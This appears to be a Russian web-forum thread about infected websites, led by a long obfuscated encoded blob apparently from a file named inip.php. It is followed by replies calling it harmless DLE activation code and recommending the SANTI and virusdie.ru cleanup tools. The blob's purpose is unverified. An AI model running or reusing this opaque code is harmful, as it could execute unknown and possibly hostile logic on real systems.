itJ/GtJ/QEJ5nNS6ith5KESlfm9u7FKH3jGW/ETMI7IXcuSHn8+TdCIS1Q16sYal0MGSi/IpYY1oi8+WGmG6QEzXcs2t37+H6/SAdM+pIIUpFVpLcP+HrWzTI+1HnsIX0Czo3xGd362WuESlf3Up17IXcu9Lb8ULkFS6itJ/GtJ/QEltcJJt3Uh6iJ16sYRLcP+HrWzTI+1HnsIX0Czo3xGd362WuEShQD1ot6Io3CGodsGTisSHi8+WGmGMf3UXcMITJVpEsD2Wd4IT/MGd38+Wi/UpnthFI1hFdCc5/lUpkERHiQKSiZGSv8+S/Z2Tuj2onu1MFVpE1/2Sdm2WdC+HrPGlf7cJrXlJrtSsc1JLfj1M3FKScnRHcLKH3jGW/ERE072p2m9u7F2HdQGTisGTcC+otjGAdnGHJYalfFKH3jGW/ETMIQKTrE2MII9ummGLf7zSiZGSN7UpcCJ53hdtQE2HdQGTisGTcC+otjGAdnGHJESlfmDl0VpLcCJ53hdtQE2HdQGTisGTcC+otjGAdnGHJESlf3UXc8IX1n+EiQzSN7UpcCJ53hdtQE2HdQGTisGTcC+otjGAdnGHJESl4WKT4ZGl4WKT4ZGlfm9ummGLf71t3Nh6iJTMIZGT4/KAc/Gt3QKTrEITtEGlIIUp53UpULNJr5U50m263FzSUYDp0lhs3JSsc1JLfj1M3QKTrEITtEGlbERLcCJ53hdtQE2HdQGTisGTcC+otjGAdnGHJESlfmDl0VpLcZGT4/KAc/Gt3QKTrEITtEGlf3UpcCJ53hdtQE2HdQGTisGTcC+otjGAdnGHJEShQD2HdsSHi8+HxmGlf7Up1ZGT4/KAc/Gt3QKTrEITtEGlUQ1Xi/+odPIodFSH4n+WI6KTI/RBvHilfm9um3pE6/+Xi/zTKYDo/Z2HdsDpfFSsiahsx1cdQE2HdQGTisGTcC+otjGAdnGHJESlfmDl0VpLcCNs3als/tTMIZGT4/KAc/Gt3QKTrEITtEGlIIUBsYIo3s2Wtj2H4mIpYY1t3Bhs3RlJd+1Ai/+odPIodFSH4n+WI6KTI/16sQGWtQ2HJQGWtQ2HJYDhQDzTKYDpcCNs3als/tTMIZGT4/KAc/Gt3QKTrEITtEGlIIUp53UpULNJr5U50m263FzSUYDp0lhs3JSsc1JLfj1M3QKTrEITtEGlbERLcCNs3als/tTMIZGT4/KAc/Gt3QKTrEITtEGlIIUpFmUXQD1Xi/+odPIodFSH4n+WI6KTI/UBsY1t3Bhs3RlJd+1Ai/+odPIodFSH4n+WI6KTI/16sVpEsDCNmmGLf7UoGm+odCGSnm2AcZDp0lhs3JSsc1JLfj1M3QKTrEITtEGlbERLcZGT4/KAc/Gt3QKTrEITtEGlfj1M3nGo6m+E0n+WdQRW4jGM2mUpFYyumMGSt6zS1/SH3jKHJYDt1ah6cCc5/lUpkERH4n+WI6KTI/RM2j1Xi/+odPIodFSH4n+WI6KTI/UpkERHtF+T/j2otjGTuj+orE1MFVpE6/+Xi/UocmGlYLhotjGAdnGHJYGW/QGl0j+ANYGW36+WNLDhQD1oi8+WGmG6QEKHnn2Ei/IpIIUBsYDpcQKTrETMIPzotM2Hds16sYUhsY1M2mUBbF+otjG6QEKHnn2Ei/IpIIUB7Y1oi8+WGmG6QEKHnn2Ei/IpII9umPzodPz63k2Av7DhQD1tcm+TdMUBsY+WdAUo6mKA18do/xGSU7UpFVpLcJzT6/2LsO2Acn2EN7DhQD1o/ZSH48GHdFSH/jUBsYcFtvJsJVpLcxGT6LGS1CzTNYal0n2E1nylf7DhQD1X1/2AdQIpf3UpUL9u7FISi/2Wrn+TJYalfLUPQD1oixGBdC2otZ2AI82WNYalfLUPQD1otQ+o3ASH48GH/jUBsYGWtQ2HJVpLcPzodPz63Q+H2Yal0WKT4ZGhQD1omZSHtM2WtrUBsYKS1MKSFYDpFVpLcNlt0CJsdvcLf3UpcCJsdldFdlTMINlt0CJsdvcLII9u7FSs/NUBsY1ocLRhrZKTG/2AtQDpfFS6itJ/GtJ/QEJFdih6ctSst5ctUESlfm9u7FS6c1hJJYal0szT6/UpYmUpQ71oi8+WGmG6QEGotsGd3nGom62ANESlfqUBKuDhQD2Wd4IT/MGd38+Wi/UpnthFI1hFdCc5/lUpkERAiwzTrZRHc/GWt6+XNj2Hxm+LruzXfEDhQDzTK7Uo/Z2HdsDpfFS60aJ6c+1HtPIo/8+LIIUpFYDlfFKTiszT3jUBsY1t3Nh6iJTMInKAcm+HkEShQDGT4ZGlfFKTiszT3jUBsY1t3Xcdc+1HtPIo/8+LII9ummGLYYzSiZGSN7UpcCJ53hdtQE+T3F16sYDlfmUpcx+HNYalfFS60aJ6c+1H68GpII9um/+Xi/Upcx+HNYalfFSsItdtQE+T3F16sVpLcx+HNYal0s+AcMKTrZ+o/sUpYY1o68Gp4s2Ed/RoGn+Xi/UpFVpLcnKAcm+HkYal0s+AcMKTrZ+o/sUpYY1otPIo/8+L4WKT4ZGl4WKT4ZGlfm9ummGLYYDpcx+HNYUhsYUWdFzScjGSIZUWtjGpfF+T3FUp53Up1xKT/jUWtjGpfF+T3FUp53UpULDl0n+WNY1o4mK63s2LfmUXQD1X18IMf3UpcFKLsO2AduGS1C2Sd/2EF7Up1hcJ4tN6NYNs3dh/N7DLFYKSvYKH36+ENYc/1ahlfLR/0lcJG1TpfjU/3u+AisULFVpLcZIots263jGSIZUBsY1X18I6QEKH36+ENEShQD1X18IMf3UpcFKLsO2AduGS1C2Sd/2EF7Up1hcJ4tN6NYNs3dh/N7DLFYKSvYKH36+ENYc/1ahlfLR/0lcJG1TpfjU/3P+H6xGTrs2MUm9u7FKH36+EcCKH3x+TdjIXvYalfF2W3ATMIP+AdjIpII9ummGLYY1XisKScZSHr/IAvYaP5uvpfmUo6ZGMYYUW/jGWbLRp1/2E182LUQ1o4n+WI+1AcMzTtQSH4m+T/s16sYDhQDzTK7UpcP+AdjIt3P+H6xGTrs2MfOvPfuUpFY+SiEDpfLzTrW+MUQUWdM2W3MULuF+otjG6QEIX1mKT4C+o/xzSNESlfm9um3pLc62HdMSHIM+AduUBsYGHdsSAGn2Ev7Up162HdMGA18ISfLDhQDzTK7Up5FISi/2/3E2W362pfmUXQD1XdZGS1CGA18ISfYal0n2E1nylf7DhQD1ocLRhr4ITdMylYYU/ith5dBdpfqU5GlhssYULrdJsdlJt1tcF/KUpkLSAdZGS1E2W362XvYh615cdUYN/FYzTNYNdiBULFVpEI7zT4/UpYY1X18IMf3UpcFKLsOGHdsSA18IMYmUpFYyu7FISi/2/3E2W362tQF2W3ATMImGpIISlf3UotM2WtrUpYm9umW+A1/KTi7UpYY1X18IM0n2MfFzHdrUBsO1XGn+Xd/UpFYyu7FISi/2/3E2W362tQF2W3ATMImGpIISdQFzHdrSlf3UXis2W/u2H4n2Hn/2MYFIWtQITJm9um3pEsD2HdsSAGn2Ev7Up162HdMGA18ISfLRpc62HdMSHIM+AduUpFVpLcFKLsOGE1/GlYm9um3pLcPKScCzTrW+Mf3UoI/It3HKS1ZDpfLKHtsGTI82EFLDhQDzTK7Uptm263n2E1nylYY1oinIt3m+WG8UpFYDl0VpLcPKScCzTrW+Mf3UotM2WtrUpYm9u7FGoUxaEt6GS1rDpfLJsdvcJiJUp7Yc/1ahlfLR/0lcJG1TpfjU/3PKSc/GH3Myl0aJFctJL0pTl0u+AimU5thNMUm9umAzo/QGlf7UpcM+A2YalfFGoUxaWI/It3M+A27DlfmUXQD1oinIt3m+WG8TMcM+AI+1H/F166IUBsYKS1MKSFYDpFVpWG82WdnKHYYDpfF2W3AUotZUpcwGSFYahkFIWtQITJYDl0VpLcPKScCzTrW+6QF2W3ATMImGpIISdQFzHdrSlf3UXis2W/u2H4n2Hn/2MYY1XGn+Xd/UpFVpEsDCNmZGScCIWtM2MYYUWinIodE+A1rULuFKHtsSH/jGWbYDhQD1ocLRhrW2Wd/DpFVpEsDzTK7Uoi8ITrsDpfFKHtsSH/jGWbYDlfmUXQDGW3MGTtPzpf7UpcPKScCzTrW+M0n2MfFzHdrUpFYyu7FKHtsTMcwGS/+1H/F166IUBsY1ox/ydQE+WtxGlII9u7FKHtsSA0n2WdjIo/FTMcwGS/+1H/F166IUBsY1ox/ydQE2otMGTrszTNEShQDCNm3pW/WDpfFS61tJddtJ6c+1HtPIo/8+LIIUBs3Up1Q+HI8ISNLDl0VpEi/It3P+H3wzTJ7Up1F+odCISi/2/3mGpUQULUQvpfm9umZGScCKH38zH//DpfLGo4/SHrn+TJLRpULRBfYDhQD2HdsSHi8+HxmGlYYUWcQGd3uKSiZIH3MGpUQULUQvpfm9umZGScCKH38zH//DpfLGo4/SAiwzTkLRpULRBfYDhQD2HdsSHi8+HxmGlYYUWcQGd3jGSIu+lUQULUQvpfm9umZGScCKH38zH//DpfLGo4/SHnn2HYLRpULRBfYDhQD2HdsSHi8+HxmGlYYUWcQGd3P+H6u+pUQULUQvpfm9umZGScCKH38zH//Dp0ZGSiZzT3jSHrn+TJ7DluLULuuUpFVpF0ZGSiZzT3jSAdj2HdsDpFVpF0ZGSiZzT3jSHc/2AcM+AF7DhQDzTK7UpcP+HrWzTI+1HdkIX1nSH48GH/j16sYDl0nISc7DpFVpW6ZGMYYUW/jGWbLRpcQKTrETMIm+Wc/yt3x2HI/16sQ1o4n+WI+1H/jGodkSHdkzSNESlfm9um3pLcn+o48I63Q+HIm+Lf3UXcMITJVpW/WUpYFKH3jGW/ETMIQ+HIm+/3Q+H2ESlFY1otQ+o3ASH48GH/jUBsYKHn/KHxCKT4Q+AIC+o3EzTkYDpcCldfQ1oi8+WGmG6QE+o3EzTrC+o3E16sm9ummGLf7Ulcn+o48I63Q+HIm+LFY+SiEDpfLzTrW+MUQ1o4n+WI+1H/jGodkSH6ZGHJESluF+otjG6QE+o3EzTrCGS1MSZUESlfm9ummGLYY1otQ+o3ASH48GH/jUpFYyummGLYY1oi8+WGmG6QEGSns2WtC+o3EzTkESlfmUXQDzTK7Uptm2Ai/IpYY1t3hcd1Tcd1+160UJt30ddcUS6dhcdUESlfmUX4bUT/Z2HdsDpfFS6itJ/GtJ/QEJ5nNSstdd5nCJt2ESlfmUpFYKSdszpYm9u7FISi/2Wrn+TJYalfFS6itJ/GtJ/QEJ5nNSstdd5nCdditJLII9u7FKH6Fid3uKSiZIH3MGpf3Uo6FilYY1t3hcd1Tcd1+160UJt30ddcUS60S16sYDhQD1X082ANYal0s2Ed/9u7FKHn/KHxC+o3EUBsYIX16GhQDCTdQ2HdmGLYYzTrsIWtQDpfFS6itJ6i1hsr+1HcQGd362HdMSH/F16sYDlfOvp00hFNY1t3hcdihlJ39TMIF+odC2otZ2AI82WNESlfmUXQD1XdZGS1jKT6/UBsY1t3hcdihlJ39TMIF+odCISi/2/3mGpII9u7FKH6Fid3uKSiZIH3MGpf3UpcCJsdhJs/ah/QEGo4/SA0n2AiA+A1F16sVpLcu+AisUBsYGWtQ2HJVpW/WUpYn1t3hcdihlJ39TMIPzodPz63Q+H2ESlFY1oi7GTiwSH48GMf3UXcMITJVpE6/+Xi/zTK7Uo/jIXGn+pYY1t3Bhs3RlJd+1HcQGd362HdMSH/F16sYDlfOvp00hFNY1t3Bhs3RlJd+1HcQGd3uKSiZIH3MGpIIDl0VpLc62HdM+WtxGlf3UpcCNs3als/tTMIF+odCISi/2/3mGpII9u7FKH6Fid3uKSiZIH3MGpf3UpcCNs3als/tTMIF+odC2otZ2AI82WNEShQD1X082ANYal0WKT4ZGhQD1oi7GTiwSH48GMf3UXcMITJVpEsDzTK7UpcCJFdcdJdhdtQE2AdLKTiszT3j16sYahsY1Hc8+o3EzTkEDl0VpLc62HdM+WtxGlf3UpcCJ53hdtQEISi/2Wrn+TJEShQD1oixGBdC2otZ2AI82WNYal0xGBJ7UpcCJ53hdtQE2otZ2AI82WNESlfm9u7F2o3ZIpf3UXcMITJVpLcPzodPz63Q+H2Yal0s2Ed/9um3pEsDzTK7Uoi7GTiwSH48GH/jDpfFISi/2Wrn+TJQ1oixGBdC2otZ2AI82WNQ1X082ANQ1oi7GTiwSH48GMfmUpFYyu7FzSiC+o3EGTcCzTkYal0s2Ed/9u7FGo4/SH48GH/jSHnn2HYYal0xGBJ7UpcCJsdldFdlTMIUdtcNSsnaJ6NESlfj1o6/+T1/2/3mGtQEISi/2/3mGpIIUprZzo54DpcP+TN6SA0n2AiA+A1FDlfj1oi8+WGmG6QEzHdr16sYRWcnIoJ7Up1G+TNLDlfm9ummGLYYUlcCJsdhJs/ah/QEGo4/SAdZGS1CzTNESl0n+WNY1t3Bhs3RlJd+1HcQGd362HdMSH/F16sYDl0VpLcCJsdhJs/ah/QEGo4/SAdZGS1CzTNESlf3UpcCNs3als/tTMIF+odCISi/2/3mGpII9u7FS6itJ6i1hsr+1HcQGd3uKSiZIH3MGpIIUBsY1t3Bhs3RlJd+1HcQGd3uKSiZIH3MGpII9um3pE6/+Xi/UXQD1ocQGd3Q+HIm+/37KSi7UBsYULUVpW/WDpfFS61tJddtJ6c+1Ai6KWtPIo/8+LIIUBs3UpIF+H48GH/j1MFYyu7F2WdZIT4sUBsYUP4W+HrsUoi8+o3MaS1/GBkLRLcQKTrETMIm+Wc/yt3/2E1uKSiZ16sYRLUbRHG8+ENOUPQDCTdQ2HJD1X1/2AdQIpf3UpUL9ummGLYY1oi8+WGmG6QEGSns2WtC+o3EzTkESlfmUot6IoY7DhQD1o/ZSH48GHdFSH/jUBsYGWtQ2HJVpEsDzTK7Upcm263Q+HI/Gt3m+L0n+WNYUlcCJsdhJs/ah/QEGo4/SAns2W5ESl0n+WNY1oi8+WGmG6QEGSns2WtC+o3EzTkESlfmUXQD1t3hcdihlJ39TMIF+odCyXcMKlIIUBsYIX16GhQD1t3lcdtdcdiJTMIZIT1nKAcm+HkESlf3UpIF+H48GH/j1ZQDCNmmGLYY1o/ZSH48GHdFSH/jUotjGpfFS61tJddtJ6c+1Ai6KWtPIo/8+LIIUBs3UpIF+H48GH/j1MFYyu7FS6itJ6i1hsr+1HcQGd362HdMSH/F16sYalfF+TdxKWdMSH/FTMI62HdMSH/F16sVpLcCJsdhJs/ah/QEGo4/SA0n2AiA+A1F16sYalfFKH6Fid3uKSiZIH3MGBQDzTKYDp0m+EcHKTu71t3Nh6iJTMIQ+HIm+/3j+AcC2HtHGlIIDlfmUXQD2HdsSHi8+HxmGlYYUWcQGd362HdMSH/FULuLULuuUpFVpEi/It3P+H3wzTJ7Up1F+odC2otZ2AI82WNLRpULRBfYDhQDCTdQ2HJYyumZGScCKH38zH//DpfLGo4/SAdZGS1CzTNLRpcxGT6LGS1CzTc+1AdZGS1CzTNESluZiPJYDhQD2HdsSHi8+HxmGlYYUWcQGd3uKSiZIH3MGpUQ1oixGBdC2otZ2AI82WNQvZK6UpFVpEsD1Xcm+TdC+W3AUBsYIo/xGlYmUpQ71oi8+WGmG6QEGotsGd3nGom62ANESlfqUBKuDhQDzTKYDpcP+HrWzTI+1H48GH/jSH48GMIIDlfFGoUxaEt6GS1rDpfLc5dvcdctU5GlhssYULrNJFdoldYYRL1C+o3EzTrC+o3EUtIUcd1tUo/uUBsY1AQFSs/NCl2LDhQDzTK7UpcP+HrWzTI+1H48G637KSi716sYDl0VpLcZKT4sUBsYUWtLKHn/GWI7zWxx+E042EisISGAyX/gvB5MvZN6iP2k9lUVpLc7KSi7UBsY1M2VpEiMKTrFDpf7Uoc8IT1QGlfmUo6mKA18Io/xGlYmUp7YvhfuvBfuvpfm9umW+AU71oFYalfu9McmUBur9McmUpQwDl0VpLc7KSi7Upk3UpcZKT4syA1n+WN7UBfQvZvYDSsVpEsD1onn2HYYal0xGBJ7Upc7KSi7UpFVpEi/It3P+H3wzTJ7Up1F+odCzotZzpUQ1onn2HYQvZK6UpFVpLcCNs3als/tTMIF+odCzotZzpIIUBsY1onn2HYVpLcxGT6LGS1CzTc+1Hnn2HYESlf3Upc7KSi79u7FGoUxaEt6GS1rDpfLdd05NdctUpUjdditJ/0lcJG1TpfjU/362HdM2M0ZGSNYzotZzBsEULkFzotZzpfjUL2QUo4n2AcFKSc/alIV1Xcm+TdC+W3ACl2QUo48GHI/Gt3m2BsEULkFSs/NUpkL1M0Sl5dlcl062HdMSH/FalIV1o6/+T1/2/3mGtQEISi/2/3mGpIICl2LDhQDCTdQ2HJD1ocLRhr4ITdMylYYU/dNc5tJclfLR/dhcd1NJFdoldYYRL1CISi/2EvY2HdsUo4n2AcFKSc/alIV1Xcm+TdC+W3ACl2QUo48GHI/Gt3m2BsEULkFSs/NUpkL1M0Sl5dlcl062HdMSH/FalIV1o6/+T1/2/3mGtQEISi/2/3mGpIICl2LDhQDCNmmGLYY1o/ZSH48GHdFSH/jUotjGpfFKH3jGW/ETMIQ+HICzotZzpIIUotjGpf7DpcCNs3als/tTMIF+odCzotZzpIIUp53UpcxGT6LGS1CzTc+1Hnn2HYESlFY+AUYDpcxGT6LGS1CzTc+1Hnn2HYESlf3alfLULFmUpFYyu7FzSiC+o3EGTcCzTkYal0oNJ4hchQDCNmmGLYY1o/ZSH48GHdFSH/jUotjGpfFKH3jGW/ETMIm2t3P+Hrs2W3Q16sYahsY1Z5EKTrFUptPzodPz63jGScgDpfF+TdxKWdMSH/FTMIQ+HIEGTcCzSfESluFSs/NUpFYKTrFUpcCJFdcdJdhdtQE2AdLKTiszT3j16sYUhsY1Hc8+o3EzTkEDlfFzSiC+o3EGTcCzTkYal0oNJ4hchQDzTK7Up5FzSiC+o3EGTcCzTkYDl0VpLcxGT6LGS1CzTNYal0n2E1nylYm9umZGScCKH38zH//DpfLGo4/SAdZGS1CzTNLRpULRBfYDhQD2HdsSHi8+HxmGlYYUWcQGd3jKT6/ULuLULuuUpFVpEi/It3P+H3wzTJ7Up1F+odC2otZ2AI82WNLRpULRBfYDhQD2HdsSHi8+HxmGlYYUWcQGd37KSi7ULuLULuuUpFVpEi/It3P+H3wzTJ7Up1F+odCKH3x2ouLRpULRBfYDhQD1t3hcdihlJ39TMIF+odCISi/2/3mGpIIUBsYvBQD1t3hcdihlJ39TMIF+odC2otZ2AI82WNESlf3UpUL9u7FS6itJ6i1hsr+1Hi7GTiwSH48GMIIUBsYvBQDzTK7UpcP+HrWzTI+1HdkIX1nSH48GH/j16sYDl0nISc7DpFVpEsDzTKYDpfFzSiC+o3EGTcCzTkYDl0FGTGm+WJ7UpIvhsIXcJcClJkERpcm263Q+HI/Gt3m+Lfm9u7ValVnRPIq

вот суки тоже под страницы удалил !! оторвать бы им яйца 

Я нашел вот такой инструментик САНТИ называется http://santivi.com/ он и мониторит целостность файлов, и бекапит, и сканит и по яндексу/гуглу проверяет. Ребята говорят что бесплатный инструмент, помогли мне его даже настроить и сайт полечить - вобщем советую, может пригодится кому.

Обычний файл inip.php Закодированный Найди byterun decoder и раскодируй Ни чего там нету кроме привязки к дле ньюс Точнее активация двига

Для лечения сайтов предпочитаю использовать virusdie.ru. Шелы, дефейсы удаляет только в путь. Устанавливать и заморачиваться ничего не надо. Облачная фиговина.

Сам автоматически сканирует (ну, месяц конечно, пока триальный аккаунт), отчеты на почту приходят. Но вот, чтобы посмотреть какие именно файлы заражены, вредоносный код в них увидеть с выделением, вылечить сайт - придется как минимум месячный аккаунт купить.